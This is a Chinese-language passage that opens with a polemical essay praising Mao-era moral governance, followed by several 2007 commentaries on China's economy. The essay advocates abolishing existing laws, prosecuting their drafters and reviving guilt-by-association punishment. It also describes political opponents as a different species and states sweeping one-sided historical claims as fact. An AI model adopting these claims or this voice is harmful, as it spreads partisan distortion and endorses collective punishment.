岁，无一漏网地全部被纳入了被侮辱被损害的悲惨地位。这就是中国右派叫喊的所谓法治，这就是中国知识精英叫喊的所谓法治。如果说西方国家的法治向大众政治的转变有希望通过量变完成的话，那么中国向大众政治的转变则必须废除现有的所有法律，并且要追究这些法律设计师反人类反文明的刑事责任。其次，重建整个法律体系，理顺道德和法律的关系，确立符合天理天道，道德和法律相统一的法律原则。道德为本，法律为用。法律是强制贯彻社会道德的工具，道德是法律运行的根本，天理良心是最高的法律，这是毛泽东时代留给世界人民的重要政治遗产。如同西方国家主要依靠宗教调节，中国古代主要依靠天道调节一样，毛泽东时代的中国主要依靠道德调节，道德是无形的法律，又是最高的法律，最可靠的法律。所谓道德调节软弱的说法，是因为道德调节脱离了人民群众，是与人民群众像对立的道德，只要道德调节和人民群众相结合，就具有巨大的调节力量，甚至超过法律文本的调节。这就是前面提到毛泽东时代能够 2 部法律管天下，并且能管好天下的又一个重要原因。其实当时两部法律的设置本身就体现了崇高的道德精神：在漫漫历史长河中人民始终是弱者，是被压迫者，而中国妇女又是弱者中的弱者，所以宏观一部保护人民利益的宪法，微观一部保护妇女利益的婚姻法，站在人民利益的立场上看就已经足够了。其他专业性法律都是开放式的法律，人民群众可以根据社会发展和道德建设的需要随时进行修正，防止法律和道德相背离，保证法律和道德始终相统一。可以说，中国大众政治中道德为本的法治原则，概括和继承了中国古代社会和现代西方国家政治文明中最优秀的文明成果，是迄今为止人类法治文明发展的最高成就。古往今来中国人一直在讲道理，天道和天理是中国人最高的法律准则。政治生活把道看得高于一切，皇帝统治是是顺应天道，百姓造反是替天行道，好皇帝是有道明君，坏皇帝就是无道昏君，等等。道是什么？道法自然。可见这个道就是西方人讲的自然法。老百姓则把天理看得高于一切，凡事要讲天理，违背天理必遭天谴。天道天理构成了灿若星河的辉煌中华文明运转的轴心，中华文明之所以成为唯一流传下来的古代文明，不仅没有消亡，反倒成为 21 世纪人类发展的先导文明，就在于自始至终支配中华文明发展的是天道天理。其实现代西方国家的政治文明也在向着这个方向转变。法国《人权宣言》中的 “天赋人权”，美国《独立宣言》中的 “不证自明”，都在表示社会立法必须遵循一些带有终极性的真理和道德，和中国人讲的天道天理完全相同。由于西方文化本身有逻辑无道理，无法实现人们的道德追求和道德完善，便用宗教来补偿这个缺陷，所以西方国家几乎所有的法律宣誓都不是手捧法律，而是手捧《圣经》，表示宗教道德超过任何法律条文。并且为了防止浩繁的法律文本侵蚀和扭曲社会道德，便设置了人民陪审团这种法盲判案制度，唯一有权判决有罪无罪的陪审团成员，从全市市民身份证中摇号抽签产生，这些由身份证摇号产生的陪审团成员没有任何法律专业知识，从头至尾都是在根据道德良心进行判决，这和中国文革时期的群众判案完全一样，虽然决定罪行大小的是法律和法官，但是决定有罪无罪的不是法律，是天理良心。中国精英集团在所谓法治建设上对中华民族所犯的最大罪行，就是在所谓 “法律不讲道德” 的旗帜下，摧毁了中华民族六千年文明发展形成的所有道德资源，这是超越任何刑事犯罪的最大犯罪行为，是古今中外历史上空前绝后的严重罪行。为了捍卫道德对法律的绝对支配地位，不仅在判决过程由道德裁定，判决结果也由道德裁定，这就是美国推广的惩罚性赔偿制度。赔偿分为事故性赔偿和惩罚性赔偿两大类，前者按照实际损失来赔偿，后者的赔偿往往要破产，区别就看造成事故的原因是否属于道德品质问题，属于道德品质问题就要重罚，原则上罚到破产程度。这和文革时期中国处理不同性质的矛盾完全相同，一般性问题从轻处理，属于道德品质问题则从重处罚，并且载入个人档案成为一辈子的污点。惩罚性赔偿的另外一个重要作用，就是在财产处罚上实现了富人和穷人之间真正的平等，许多富人财大气粗不在乎打官司，那就通过惩罚性赔偿让你立刻变成穷人。中国的官僚和富豪之所以随便欺负穷人，甚至敢开着汽车随便撞穷人，就是中国惩罚穷人的法律制度决定的。中国法律表面上看，好像是法律面前人人平等，富人穷人都按照一个标准判罚，但是同样数额的赔偿，对富人可能只意味着一顿饭钱，对穷人则意味着全家破产。再加上取证的困难和高额成本，决定了穷人打官司无论输赢，往往都意味着家破人亡。通过所谓法治，把富人的侵权成本设置得很低，把穷人维权成本设置得很高，导致无数百姓家破人亡，上访民众惨绝人寰，神州大地冤狱累累，这已经不仅仅是搞什么主义实行什么社会制度的问题，完全是一种反人类反文明的犯罪行为。旧时中国有句话，叫做 “车船店脚衙，无罪也该杀”，这里的衙就是指现在的公检法讼四大家，虽然上面这句话放到现在是错误的，但是中国法律制度的设计，在整体上把中国司法领域变成了一个不讲天理人伦的魔兽世界，无论其中无数个人的品格多么高尚，只要他穿上法律外衣，就必须彻底抛弃所有道德，这就是制度设计的根本作用。如同马克思所讲的那样，资本家中也不乏品格高尚的绅士，但是只要他进入资本领域，他就只能执行资本的职能，成为人格化的资本。从这个角度来讲，用道德力量重建中国法律制度，同时也是对司法领域人员的道德拯救和人格解放。最后，恢复权利和责任相均衡、收益和风险相适应的法律原则。权利和责任相均衡相适应的原则，是人类古往今来最根本的组织法则，也是现代社会最核心的组织法则，每个人都要为自己的行为承担后果，几乎是整个世界所有国家无一例外的基本法则。可是中国精英集团却成功设置了一套权利和责任相分离、收益和风险相分离的法律制度：就是精英集团只享有社会权利，而不承担任何责任；只拥有社会收益，而不具有任何风险（爆发革命的风险除外）。这是自有国家以来古今中外从没有出现过的政治乱伦现象，它把中国封建社会的裙带关系和现代民主国家的非株连惩罚嫁接在一起加以推广，同时把封建社会的株连政策和现代民主国家的利益原则捆绑在一起加以批判。本来，封建社会的裙带关系和株连政策是相辅相成的一个事物的两个方面，株连政策是针对裙带关系设置的，既然在利益上一人得道鸡犬升天，那么在责任上就是一人犯法鸡犬不留，所以在没有消除裙带关系的情况下，只有实行犯罪株连才能体现法律的公平正义，否则就会出现目前中国这种 “豁出我一个，幸福三代人” 的不合理状况：如果腐败行为不被发现，包括腐败分子本人在内的所有家人都会世世代代享受幸福生活；如果腐败行为暴露，则是除腐败分子本人之外的所有家人仍然能够世世代代享受幸福生活，并且只要不被枪毙，将来等待腐败分子本人的也仍然是幸福生活。这种脱离犯罪性质的惩罚方式不仅在客观上起着保护和鼓励腐败的作用，同时也是对人民血汗劳动的最大不公平。所以，采用什么样的惩罚方式，是由犯罪性质决定的，绝不能孤立地看待哪种惩罚方式好，哪种惩罚方式坏，这是 30 年来中国人民的一个沉痛教训，也是中国知识分子的历史耻辱，在大力发展裙带关系的同时，大肆批判所谓文革株连政策（其实文革很少株连），是知识分子强加给中国人民的历史悲剧，直到今天许多知识分子还在张口闭口地批判所谓株连政策。目前比实行家庭连带责任更重要的是实行政治连带责任，这是惩治腐败恢复政治清明的一个重要法律制度。由于中国精英集团的妖魔化宣传，人们对株连政策形成了黑色偏见，把株连看作是十分邪恶的东西，其实包括市场经济在内的整个现代社会的基本组织原则，就是连带责任原则，商品三包售后服务就是一种连带责任，谁生产的产品谁承担责任，谁施工的项目谁承担责任。可是目前中国却存在一种十分荒唐的现象，社会所有的人都要为自己生产的产品负责，唯独各级官僚对自己生产的产品 —— 提拔的干部，不承担任何责任，这是中国干部任免任人唯亲的一个根本原因。道理很简单，如果实行连带责任，谁提拔的干部谁负责，即使从最自私的角度出发，各级干部也会千方百计提拔那些清正廉明的人，因为提拔的干部越廉洁，自己就越安全，否则即便是退休在家，也有可能因为株连而被投入监狱。党中央从来没有号召并且严格监督厂家要生产最好的产品，但是一个连带责任制度，就保证了厂家想尽千方百计要生产最好的产品，同样，如果各级官员对提拔的干部也像厂家对产品一样承担连带责任，中国干部的合格率将不会低于任何名牌产品的出厂合格率。总之，既然每个人要对自己的行为负责，是现代社会的基本原则，这个原则也必须适应于干部任免制度。条条道路通罗马的现代社会分工制度。前面所谈到的现代社会的政治和法律平等，对于绝大多数普通老百姓来讲，只是具有利益保障作用，毕竟绝大多数老百姓并不直接参与政治生活，对老百姓更具有直接作用的是分工的平等，有分工就有尊卑贵贱，就有阶级差别，人与人之间就不可能具有真正的平等，这就是马克思讲的旧的社会分工的作用，是人类社会最深层次的分工压迫。分工压迫是人类社会最后一层压迫，也是目前人类社会无法摆脱的压迫。人类社会一开始就面临着三种压迫：自然压迫、政治压迫和分工压迫。人类社会通过农业革命摆脱了自然压迫；目前正在通过工业革命摆脱政治压迫；但是目前却不具备摆脱分工压迫的技术基础。虽然新兴产业的发展让人类看到了最后摆脱分工压迫的希望，但是这个过程还只是刚刚开始，还只是刚刚接近历史发展的起点，要达到马克思设想的那种彻底消除旧的社会分工的发展水平，还需要一个相当长的历史过程。由分工形成的尊卑贵贱的阶级差别，如果不加以限制，往往会抵消掉政治平等和法律平等的积极作用，把政治平等和法律平等变成没有任何实际内容的一种纯粹社会摆设。如果说在实现政治平等和法律平等方面世界各个国家都曾做出了不同贡献的话，那么在解决分工平等的问题上，世界各地却没有丝毫作为，甚至根本就没有意识到需要解决这个问题，无论目前人文发展水平最高的北欧国家，还是当初苏联东欧等社会主义国家，都没有采取任何措施解决这个问题。只有一心一意为人民谋幸福的人民领袖毛泽东，意识到并着手解决分工所导致的阶级差别问题，这就是创建了一套条条大路通罗马的现代分工制度。其特点是社会所需要的所有职业，都设置一条能够通向社会荣誉顶端的天梯，无论你从事什么工作，是领导干部还是工人农民，是专家学者还是贩夫走卒，是大学教授还是掏粪工人，只要你爱岗敬业，能够在平凡的岗位上做出不平凡的事迹，就可以直接达到社会荣誉的顶端，就可以受到包括最高领导在内的整个社会的尊敬。当掏粪工人时传祥和毛主席一起站在天安门城楼上俯视广场上万众欢腾的场面时，当广场上的教授名流、专家学者仰望着城楼上这位掏粪工人时，他们之间由分工形成的社会鸿沟，会在不知不觉之间被悄悄填平。当时这套条条大路通罗马的分工制度，不仅能够保证社会所有职业都有希望达到社会荣誉的顶端，后来在文革中经过不断完善，甚至可以达到社会权利的顶端，文革后期各行各业有越来越多的优秀劳动者直接进入了党和国家的最高领导层，包括党中央副主席、国务院副总理、全国人大副委员长在内的各个领导岗位，源源不断地都有来自最基层的优秀劳动者担纲上任。这套分工制度的最大优点，就是让社会所有人都能看到希望，都有机会拥有美好明天，都能够掌握自己的命运，只要你在为人民服务的岗位上好好干，你就具有出人头地的光明未来。每个人生命价值的实现，不再取决于你在什么职位上干什么工作，而是取决于你怎么干能干出什么；社会的较量，也不再是客观位置的竞争，而是主观努力的竞赛；当每个人的未来发展主要掌握在自己手中时，个人价值的实现和劳动人民整体当家作主，便达到了和谐统一的完美阶段。只有在这时，社会才能逐步消除分工和私有制形成的异化发展性质，淡化由分工形成的尊卑贵贱的阶级差别，社会才能在形式和内容两个方面真正属于人民，不仅是属于人民的整体，而且属于包括普通劳动者在内的每一个具体的个人。在这个问题上，中国的左派和右派之所以找不到能够彼此沟通的共同语言，是因为中国左派和右派对生命的理解根本不同。在中国左派看来，生命是一个崇高的精神现象，本身具有内在的崇高追求；中国右派则把生命看成是一个纯粹的生理现象，人和狗没有任何差别，需要的就是一块带肉的骨头。所以中国左派认为，人吃饭是为了活着，活着是为了实现崇高的追求；右派则认为，人活着是为了吃饭，吃好喝好才是目的。所以便有了生产力标准，以经济建设为中心，甭管白猫黑猫，抓住老鼠就是好猫，有奶就是娘的道德信条。中国右派对生命的这种理解，原本来自于西方文化本身的缺陷，中国右派大都是西方文化的崇拜者，西方文化历来就把生命理解为一种单纯的物质现象，后来的文艺复兴运动和思想启蒙运动，又为这种生命观涂上了一层厚厚的物欲色彩，只是西方宗教的发展弥补了西方文化生命观的这个致命缺陷，才相对平衡了西方社会的发展。但是由于中国右派没有任何宗教信仰，把西方生命观的物欲、肉欲色彩推向了极端，结果导致了整个社会的兽性化发展，把中国变成了有史以来人类社会最堕落的地方，人类历史上所有邪恶的东西都在这里达到了极端，并且还创造了人类历史上前所未闻的各种新的邪恶。现在胡锦涛为首的党中央提出要建立社会主义核心价值观，可以说是抓住了问题的根本，但是要建立核心价值观，就必须首先回答生命是什么的问题，就必须回答人和狗有没有区别的问题，就必须回答人性发展和兽性发展的区别问题，否则，就不可能彻底摆脱 30 年来的兽性化发展轨道，就不可能改变金钱拜物教的极端异化状态，就不可能恢复社会的健康发展，中国就很有可能在物欲横流的历史沼泽中迅速沉没，最终陷入灭顶之灾。第八，人本主义为基础的微观管理制度。当今世界，不仅宏观上人本主义的大众政治制度来自于毛泽东，微观上人本主义的管理制度同样来自于毛泽东。无论是当初八十年代垂范天下的日本微观管理制度，还是目前跨国公司人本主义管理原则，其理念和原则无不是源自于毛泽东时代的 “两参一改三结合”。所谓 “两参一改三结合”，是指工人参加管理，干部参加劳动，改革不合理的规章制度，由厂长、技术人员和工人组成三结合的领导班子。“两参一改三结合” 的管理模式，不仅能够使企业充满和保持强大活力和创造力，更重要的是把工人由以往的管理对象变成了管理主人，这是企业管理制度根本性质的变化。它标志着人类生产管理模式，由最初奴隶社会的棍棒式管理，再到后来资本主义的饥饿式管理，发展到了现代社会的尊严式管理，即把管理建立在尊重全体工人尊严的基础上。这是人本主义原则在微观管理领域的根本体现。它的革命性质变就在于，由于工人成为了管理的主人，企业不再是工人单纯挣钱谋生的地方，如同现代企业家一样，企业同时还是工人人格力量的外化，是工人生命价值实现的地方，是工人生命的外在形式，因此工人才会爱厂如家，像关心家庭那样关心企业。虽然以跨国公司为代表的现代企业的基础和运行方式发生了很大变化，具体管理方法也随之不断变化，但是毛泽东时代中国确立的人本主义管理原则，仍然是现代企业管理制度的核心和基础。只是让历史老人不知该哭该笑的是，创建了人本主义微观管理原则的中国工人，后来却成为工业社会以来最悲惨的工人，不仅工资比重被压低到历史最低水平，甚至连罢工自由的权力都被取消了。更让人不知该哭该笑的是，中国的右派居然认为拥有罢工自由的时代，是没有人权的专制时代；而取消罢工自由的时代是人权发展的民主时代。中国右派越来越异常的思维方式，使得中国右派和民众之间的差别，越来越变成物种之间的差别，彼此之间越来越找不到生物共同点了。……………………可是，这种建议，并没有阻止中国经济令人啼笑皆非的表现。许峥发来的内容。或许没有什么能比就业更能嘲弄中国的宏观调控：2400 万，2007 年中国新增的城镇待业大军，其中包括 600 万应届和上一年大学毕业生，即使按照中国劳动和社会保障部部长田成平日前透露的全年就业目标，完成 1200 万就业，也还将有一半人员失业。这就是偏热的中国经济增长？这就是充分就业下的经济增长？这种就业增长还需要三令五申的宏观调控？请别再给中国经济下 “蒙汗药” 了。总量调控，确实是西方市场国家一以贯之的宏观调控方式，但是对于一个正在市场化、全球化的中国来说，无论是货币传导机制、市场结构，还是微观主体的敏感程度，都是望 “洋” 兴叹，如果中国的宏观调控部门不顾中国国情，盲目地根据西方经济学照方抓药，最后肯定不是上吐，就是下泻。一个潜在的危险是，中国的总量调控，很有可能会引起商业银行的逆向选择，更多的资金会流向收益性高、风险不易发现的中长期贷款，而企业的流动资金却受到挤压，尤其是中国最有活力的民营制造企业的资金，事实上，自 2004 年以来，每次宏观调控，最先遭殃的都是制造企业的流动资金，而这正是解决中国就业的主力军。一个没有充分就业的经济增长，肯定不能被称为经济 “过热” 或经济 “偏热”，而由此引发的宏观调控，更是有失妥当。很显然，与中国改革开放初期相比，目前中国的宏观经济管理，多了一些半生不熟的 “倒爷” 理论，但失去的却是 “摸着石头过河” 的探索精神。……………………WWF 呼吁重新思考中国在全球经济中的新作用“由于中国对外投资飞速发展，整个世界都需要重新考虑现有的全球经济发展模式。” WWF（世界自然基金会）26 日发布《重新思考中国境外投资》报告认为，中国现有的这种经济模式将使全球自然资源日益枯竭，并阻碍全球可持续发展的实现。WWF 这一全球环境保护组织对中国对外投资增长的原因进行了深入研究，发现中国对外投资的增长取决于两方面的需要，一方面是获取自然资源，从而为像美国或欧盟等发达国家提供产品；另一方面则是满足国内经济的快速增长。报告的作者之一，WWF 贸易与投资顾问 DennisPamlin 表示：“中国现有对外投资在很大程度上是受西方工业发展模式的影响。我们需要探索新的生产和消费模式，否则，我们在未来就会为获得自然资源而争斗。”通过分析，报告预测在未来的几年内，中国对石油、铁矿、木材、棉花和大豆等产品的进口需求将会成倍增长。而大部分中国进口的自然资源都是以增值品或成品的形式重新出口给其他国家消费。例如，有人认为中国从东南亚国家大量进口木材是对热带雨林的一种威胁，但事实上，70％的进口木材都被制成家具出口至美国和欧盟。因此，美国和欧盟的消费者仍然应当承担世界范围内生态系统遭受破坏的责任，只是通过消费中国产品这样一种间接的方式而已。WWF（中国）战略总监李琳表示：“发达国家现有的不可持续性消费模式正在向世界其他地区渗透。这也引发全球各国对自然资源的争夺，并导致自然生态系统的崩溃。中国和印度等国经济的增长加剧了这种趋势，因此，需要重新考虑如何维持全球可持续性发展这个问题。” 报告认为，目前现有的经济发展模式是线形模式，该模式忽视了一个不可忽视的事实 —— 地球上的自然资源是有限的。世界的经济发展模式应该转化成 “循环经济”，这种循环经济是建立在有效利用资源的基础上的。报告还描述了一种 “三角模式”，建议将其运用到全球贸易投资政策制定以及全球外交中。这种模式将国家和地区划分为三大类，即自然资源供应方、产品和服务生产制造方以及在全球贸易系统内的消费方。李琳补充道：“中国当前的基础设施和投资模式使建立更好的经济发展模式成为可能。这种模式将为世界以及中国经济的长期可持续发展提供支持。” 此外，DennisPamlin 强调，中国在探索、改变自身发展模式时，政府部门的引导作用不容忽视，政府要帮助一些企业尤其是资源型公司做改变，尽量让产品在节约和有效利用资源的前提下生产出来。“资源提供者、生产者、消费者这三者之间的关系需要重新考虑，并达到一个平衡。”……………………中国宏观经济政策面临三难关去年中国经济继续以超高速度增长，既给中国带来了骄傲，也给政府带来了尴尬。骄傲的是，中国再次吸引了全世界的眼球。尴尬的是，几乎所有的政府宏观调控目标，如降低增长速度、改变依靠出口和投资带动增长的经济结构、将更多的资源用于改善人民生活等等，都没有能如期实现。这种尴尬的局面表明，中国政府的宏观经济政策正面临进退失据的困境。这种困境是当前中国经济、社会中的三个难点问题的具体体现。第一个难点是，经济增长的速度既高不得、又低不得。中国经济增长的模式，始终停留在一种外延式的增长陷阱之中。按照联合国和世界银行的绿色国民生产总值统计口径，如果将增长的环境和社会成本也考虑在内，中国实际上是负增长。　这样的增长一没有福利效果，二不可能持续。解决这个问题的唯一办法，就是把经济增长速度降下来，把经济中的结构问题调整好。但是，中国目前有五六千万的城镇失业人口，还有两亿多的剩余农村人口等待流向城镇。经济速度一降下来，本已巨大的失业压力就更大。第二个难点则涉及对外经济政策，那就是人民币升值既快不得、又慢不得。去年，中国的外贸出口继续以超高速度增长。作为世界第一位汇储备大国，中国面对越来越强的国际压力。人民币不得不缓慢却逐步地走向升值。人民币汇率，如果拒不升值，不仅无法调整以出口带动增长的不稳定的经济结构；同时也意味着中国穷人继续以低消费来补贴发达国家消费者的低物价。除此之外，由于购买外汇所发行的人民币过量，中央银行最终有可能失去对国内货币政策的控制。但是，如果实现人民币较快速度的升值，那么，中国低素质的出口企业的国际竞争力就会遭到削弱，从而对国内的失业问题和农民工的收入分配带来强烈的震撼。第三个宏观政策的难点是，社会收入政策的变化，既左不得、又右不得。二十九年来，中国贫富之间的收入差距已经达到了令人无法回避的程度。用来衡量收入分配差距的基尼指数，在中国已经高达 0.46。这个速度，不仅高于所有的发达国家，也高于大多数发展中国家。由于中国政府在这三个难点面前举棋不定，所以所有的宏观调控政策都只能是进一步、退两步，半心半意地蹒跚而行。这正是许多宏观政策无法奏效的根本原因。更重要的是，中国没有一个合理的政治框架，供不同的社会集团就社会难点问题进行有效的协商，从而寻求最有可能被社会各界接受的妥协方案。……………………可能让中国经济脱轨的三个泡沫在关于中国崛起的所有激动人心的描述中，最令人难以置信的可能是关于中国股市的。现在，中国股市的规模已经超过了中国的国内生产总值。中国的经济保持着近 12% 的增长速度，口口相传让股市得到了更多的关注。最令人惊讶的是，大家都知道中国股市存在泡沫，但似乎没有几个人在意。这引发了一个重要的问题：中国的股市是否已经发展到了下跌会危及经济的地步？观察家经常会说这样的危险很小，他们认为中国的股市只是附属品，不过是经济飞速增长的表现，与经济本身没有多大关联。现在，股市的规模已经超过了国内生产总值，它正在逐渐变成重大的经济风险。股市暴跌的确会造成财富的缩水，但是真正可怕的地方在于，这会损害中国和海外的信心。这还只是危及中国发展前景的三个泡沫中的一个，如果不是这样，对股市的疯狂也就不那么令人担忧了。另外两个泡沫分别是中国食品安全危机和污染问题。中国的质量管理难题和环境面临的挑战往往不被视为泡沫。然而最近，中国制造的玩具被召回，从牙膏、海产品、食用油到病猪肉，问题商品层出不穷。糟糕的商业手法和松懈的管理造成了泡沫，并在损害中国在全球的声誉。否认无助于解决问题，每当中国政府官员指责外国媒体夸大事实并引发对中国食品安全和产品质量不必要的担心时，新披露的这种或那种有问题的商品就会跳出来为媒体辩护。污染也在逐渐成为危害经济发展的泡沫。经济合作与发展组织在上月一份报告中说，中国污染严重的环境已经 “极大地损害了人的健康”，并影响到经济继续发展的前景。最近，北京的官员重新采取了上世纪 90 年代初的政策，当时他们曾无限期地推迟计算 “绿色 GDP”。中国即将取代美国成为温室气体排放量最大的国家。想想当 4 亿中国人拥有汽车的时候，这个地区的天空会是什么样？随着中国经济的持续繁荣以及更多农民工涌入城市，污染问题极有可能恶化。中国的空气和水源的污染情况将更加严重，污染也将日益向境外蔓延。鉴于中国需要在很大范围内消除贫困，重点抓经济优先于解决环境问题也就不足为奇了，但这种做法已不再可取。发展能力经受考验这三种泡沫的共同点是，它们都是控制性问题。对于中国政府来说，它目前正在控制股市、公司和环境方面遇到重重困难。如果分而治之的话，每种挑战都可能对中国经济造成损害，而同时应对这些挑战又会增加风险。这也在很大程度上说明，中国的迅猛发展正在产生危险的副作用，而这种副作用可能会吞噬中国成为世界大国的前景。另一种风险是，美国次级抵押贷款业的危机日益严重。美国财长保尔森、美联储主席伯南克及其他许多决策者和投资商都认为混乱状态正在得到遏制，但他们都错了。与此相反，危机在快速蔓延，这给全球对冲基金和各国股市造成了重创。随着不断蔓延的信用危机造成丰田汽车公司和三星电子公司的市值受损，亚洲各大股市本月曾遭受了一年多来的最大跌幅。如果这种恶劣影响继续扩散的话，中国股市和全球对中国出口产品的需求量都可能会受到波及。显而易见，一些极为精明的决策者正在维持中国繁荣经济的正常运行。但问题是，他们维持事态正常发展的能力正在受到前所未有的考验。你由此可能会说，中国正在泡沫中经历泡沫。……………………日学者: 中国经济调整期随时会来在 29 日结束的第三届 “北京 - 东京” 论坛上，日方经济、金融代表认为，中国现在的经济和日本形成泡沫时期的局面非常相似，经济调整期可能随时到来，中国金融改革可以借鉴日本经验，以未雨绸缪。日本经济研究中心会长小岛明表示，在泡沫期间，日本的经济增长率为 5% 左右，利率水平为 2.5% 左右，过低的利率滋生了泡沫经济。相对于经济增长速度，中国目前的利率水平也维持了一个较低的区间，和日本的泡沫形成时期的数码非常相近。应采取更高弹性的外汇政策和汇率政策，谨防流动性过剩。小岛明表示，虽然现在金融机构在中国的收益率非常健康，同时也面临着高外汇储备的压力，如果调整期来临时，必然也会带来金融调整。研究日本的成功经验，不如研究日本之前金融改革的失败教训。日本央行副总裁武藤敏郎也在会上表示，要想使亚洲经济在今后继续能够享受到金融全球化的恩惠，必须防止亚洲与国际经济市场相连接的国际资本流动出现很大的问题。亚洲经济一体化进展对参与各国而言不是一场零和游戏。在亚洲，虽然让直接融资获得同银行信贷相同的地位仍然是任重道远，但通过发挥直接融资的信用中介功能的作用，能防止资本流动的大起大落。作为中方代表的回应，北京大学教授周其仁表示，国际上对中国经济过热的担忧，更多表现为对中国经济快速发展所付出高昂代价的担忧，以及这种高代价能否持续的担忧。中国目前面临的很多实际问题，诸如城市的高度集中发展问题，经济发展带来的能源消耗问题，中心城市地价急速飙升问题等等都可从日本经验中寻找到可能的解决办法。外交学院院长吴建民也指出，从历史上总结，在发生经济危机的时候，亚洲人只能靠自救解决。……………………解决中国经济失衡过程可能会相当痛苦中国国内经济学家表示，尽管由于严格的资本管制，中国没有受到最近全球市场动荡的冲击，但中国最终将被迫经历泡沫化资产价格的痛苦调整，这种泡沫是流动性过剩造成的。近几周来，中国的表现似乎与发达国家相反：不断飙升的国内股市屡次上冲创纪录高位，中国央行不断从金融体系中抽离流动性，而外国央行则在紧急注入流动资金。在两年多一点的时间里，中国股市市值如今已增长 5 倍。上证指数多次创新高。过去 10 年的大部分时间里，大城市住宅房地产价格的涨幅，超过了经济产出的增幅。过去 10 年，中国的经济繁荣和住宅市场商品化所创造的财富，令股市和房市受益。由于几乎没有其它投资渠道，且投资海外能力受到限制，这两类资产吸引了现金充裕的投机者。资本管制使这些资金被限制在国内。中欧国际工商学院的许小年表示：“流动性过剩造成中国经济失衡，这些失衡迟早要得到解决，这一过程可能会相当痛苦。” 中国已逐渐放松了资本管制。中国政府上周宣布，计划首次允许个人投资者通过中国银行购买在香港上市的海外股票。然而，中国社科院金融研究所的易宪容表示，即便这有助于抽离国内市场的一部分泡沫，但中国信贷市场基本状况仍相当脆弱。“房贷质量比美国次级抵押贷款糟糕得多，因为中国没有建立真正的信贷审查体系。这个泡沫迟早要破裂，而让这个泡沫尽早破裂是必要的。”荣中战略咨询驻纽约的荣大聂表示，中国 “基本上全部是次级抵押贷款；从投资的技术质量和相关的体制结构而言。”“然而，在这些投资周围的宏观基本面因素非常强劲，政府保证这一体系在中期内发挥作用的能力也十分强大。” 不过，中国国有投资没有直接大量进入美国次级抵押贷款市场。除了中国各家银行以外，中国政府投资于次级抵押贷款市场的外汇储备数额相对较小。美国银行 Wachovia 表示，中国在美国抵押贷款市场和资产担保证券的投资逾 2500 亿美元，但除了大约 100 亿美元以外，全部投资于信贷评级较高的机构和有机构担保的证券。……………………未来 30 年是中国经济转型艰难期国际货币基金组织于日前发布的新的《世界经济展望》中指出，中国今年的经济增长率可望达到 11.2%，受到国内经济建设和商业发展的推动，今年中国经济发展对世界经济的贡献将占到四分之一左右，中国也将首次超越美国，成为对全球经济增长贡献最大的国家。IMF 的这一判断，把中国推到了全球经济增长的焦点。这与此前中国总量超过英国成为全球第四大经济体、2006 年初超过日本成为全球最大的外汇储备国家等等综合在一起，表明中国已经成为全球经济体中极为重要的组成部分。中国在全球经济体系中总量指标地位的不断攀升，的确振奋人心。但是对我们并不是津津乐道于此，要问一下：我们从” 中国经济对全球增长贡献最大” 中得到了什么？首先，这并不意味着中国在全球经济体系中拥有明显的竞争优势，中国仍然依赖于高储蓄、高投资的粗放式增长，仍然依赖于廉价的劳动力成本优势。这种粗放式的增长以中国越来越大的资源、环境压力为代价，以中国广大劳动力、消费者的福利损失为代价。中国经济现在表现出全球最强的外向型特征，而这种外向型特征与其他一些出口替代发展战略的国家又有着重要的区别，即中国的外向型增长是 “国外资本对中国廉价劳动力的雇佣”。中国的自主创新能力并没有取得与经济增长一样的国际地位。没有拥有在国际高端产品市场充分的竞争力，只是依赖于衬衫、玩具的出口而换成膨胀的外汇收入，我们仍然会在国际竞争中承受巨大的政治歧视。美国人、欧洲人、就连日本人为什么总是在人民币汇率问题上表现出极端傲慢的姿态，根源大抵在于此。其二，如果说过去 30 年里是中国处于艰难的体制转型时期，那么未来 30 年里可能是中国经济增长方式转型的艰难时期。对于粗放式增长带来的种种弊端，至少在学界早就有了清醒的认识。过去，在衣食住行都极为短缺的情况下，我们的首要任务就是解决温饱问题。在此情况下，在低级的生产目标面前，带来美好愿望的理论总是会显得很无力，结果，在生产中总是会忽视健康和对生命的尊重。近年来，政府在节能减排、提高经济增长效益和质量方面花了大力气，也取得了一些明显的成效。但是，外部强制力的作用可能是难以从根本上解决问题的。只有随着经济总量的增长和人们收入水平的进一步提高，人们超越了温饱和简单的住行方面的需求，对清新的空气、对蓝天、阳光的需求会越来越强烈时，只有当这种需求转化成大多数中国人内在意识的时候，中国才有了真正实现经济增长方式转型的基础。中国经济的周期性波动再也不会像 20 年前那样只是中国自己的事情，随着中国经济增长对全球经济增长贡献的增强，中国对全球经济稳定的责任与担子也在与日俱增，中国面临的国际经济冲突也会日益增长。这是开放社会的必然结果。在全球化不断深化的今天，任何一个国家的发展都一方面需要良好的国际合作与协调，另一方面又充满了曲折而复杂的斗争。开放、合作最终都只是实现国内经济政治目标的途径。……………………经济应已超德　中国确实找到发展最佳路线德国之声网 7 月 19 日载文《中国经济总量应已超过德国 —— 兼谈意义和问题》，摘要如下： 7 月 19 日中国国家统计局公布的数字比专家们预计的更高。第一季度中国国内经济总值以 11.1% 的速度增长，而上半年的总速度达到了 11.5%。这意味着，第二季度的速度还远远超出了第一季度。就在中国国家统计局的正式数字公布前，世界各金融机构和专家已经纷纷估计，中国国内生产总值今年将超过德国，踞世界第 3 位。法新社报导说，英国摩根大通银行估计中国第二季度的发展速度是 10.6%。该银行专家王前（音）说：“我们在任何一个行业里都看不到减弱的迹象。” 尽管这个 10.6% 远远低于中国的正式数字，但这家银行也认为中国经济总量今年将超过德国。中国国家统计局仍然保持低调。该局新闻发言人、国民经济综合统计司司长李晓超答记者问时说：不同的机构在做这种预测的时候，结果并不相同，“但有一点可以肯定，我们和德国的距离越来越近，差距越来越小。”中国经济连续地赶超世界传统诸强，在不到 15 年的时间里从世界第 11 位奔到第 3 位，这个意义是重大的。它证明，中国确实找到了一条经济发展的最佳路线；它也证明，第三世界国家有巨大的潜力，改变贫穷面貌，从而改变整个世界面貌是完全做得到的。中国的经济地位不断 “窜升”，给全世界提出新的问题。经合组织、7＋1 集团这些以经济实力为主要标准的机构却没有已经占据世界第 3 位的中国的位置，已经带来了解释上、定义上的问题。同时，中国是否还是发展中国家，这也越来越有争议，牵涉到中国是否还应该拿发展援助的问题。还有：世界对中国越来越看重，在许多国家许多人心中，“中国威胁论” 也越来越现实。反过来，对中国来说，如何处理自己在世界上这个高升的位置和份量，也牵涉到大量的需要不断考虑和解决的问题，比如是否加入这些集团、机构，继续把自己摆在发展中国家一边吗，是否有可能以及如何消除 